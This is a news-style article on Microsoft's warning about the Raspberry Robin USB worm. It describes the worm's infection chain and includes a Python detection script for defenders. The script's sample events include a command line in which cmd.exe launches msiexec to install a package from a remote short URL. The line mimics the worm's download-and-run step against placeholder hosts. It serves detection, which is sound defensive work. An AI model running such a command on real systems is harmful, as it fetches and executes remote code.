Microsoft warns about high-risk worm infecting lots of Windows networks!!!

The struggle between good and evil never ends in the cybersecurity industry. We frequently learn about brand-new exploits that hostile actors are using, as well as the proactive and reactive defenses being developed to counter them. A high-risk worm that is currently contaminating hundreds of Windows enterprise networks has prompted Microsoft to issue secret advisories.

The malware, known as "Raspberry Robin," is transmitted by infected USB drives that contain a .LNK file. When a user clicks on this file, the worm launches another malicious file by starting a msiexec.exe process in Command Prompt. Then, it uses a short URL to communicate with command and control servers. If the connection is successful, numerous programs are downloaded and installed.
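Defenders can hunt for this chain in process-creation telemetry by looking for msiexec.exe started with a URL on its command line, especially when its parent is Command Prompt. The following is an added example, not code from Microsoft or the original article; the event field names, hostnames and URLs are constructed placeholders.

```python
import ntpath
import re
from urllib.parse import urlsplit

URL_RE = re.compile(r"https?://[^\s\"']+", re.IGNORECASE)

# Constructed process-creation events (not real telemetry). Field names are
# assumptions; map them to your EDR or Sysmon schema. Hosts are placeholders.
SAMPLE_EVENTS = [
    {"host": "WS-01", "parent": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\msiexec.exe",
     "cmdline": 'msiexec /q /i "hTTp://short.example:8080/abc"'},
    {"host": "WS-02", "parent": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\MSIEXEC.EXE",
     "cmdline": r"msiexec /i C:\Temp\setup.msi /qn"},
    {"host": "WS-03", "parent": r"C:\Program Files\Deploy\agent.exe",
     "image": r"C:\Windows\System32\msiexec.exe",
     "cmdline": "msiexec /i https://packages.example/tool.msi /qn"},
    {"host": "WS-04", "parent": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\curl.exe",
     "cmdline": "curl http://short.example"},
]

def _name(path):
    """Lower-cased file name of a Windows path (works on any OS)."""
    return ntpath.basename(path).lower()

def find_remote_msiexec(events):
    """Return msiexec.exe launches that fetch a package from a URL."""
    findings = []
    for ev in events:
        if _name(ev["image"]) != "msiexec.exe":
            continue
        match = URL_RE.search(ev["cmdline"])
        if not match:
            continue  # local package: ordinary install, not reported
        from_cmd = _name(ev["parent"]) == "cmd.exe"
        findings.append({
            "host": ev["host"],
            "url_host": urlsplit(match.group(0)).hostname,
            # cmd.exe parent matches the chain described in the article
            "severity": "high" if from_cmd else "review",
        })
    return findings

if __name__ == "__main__":
    for finding in find_remote_msiexec(SAMPLE_EVENTS):
        print(finding)
```

Remote installs started by a deployment agent are reported as "review" rather than dropped, so known software-distribution hosts can be allow-listed after triage.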

Microsoft is currently privately alerting Defender for Endpoint subscribers about the risks posed by Raspberry Robin, according to Bleeping Computer. Additionally, it said that it had found the worm in hundreds of Windows networks from various industries.

Affected computers are able to communicate with the Tor network; however, the threat actors behind Raspberry Robin have not yet used the exploit to access confidential data or spread ransomware. They could accomplish this with ease, because the initial payloads they downloaded allow Windows utilities to be exploited to get around User Account Control (UAC). It is not yet known which threat organization is using Raspberry Robin or what their final objective is. However, Microsoft has classified it as a high-risk campaign for the time being because of the threat's potential to worsen and how quickly it is spreading.
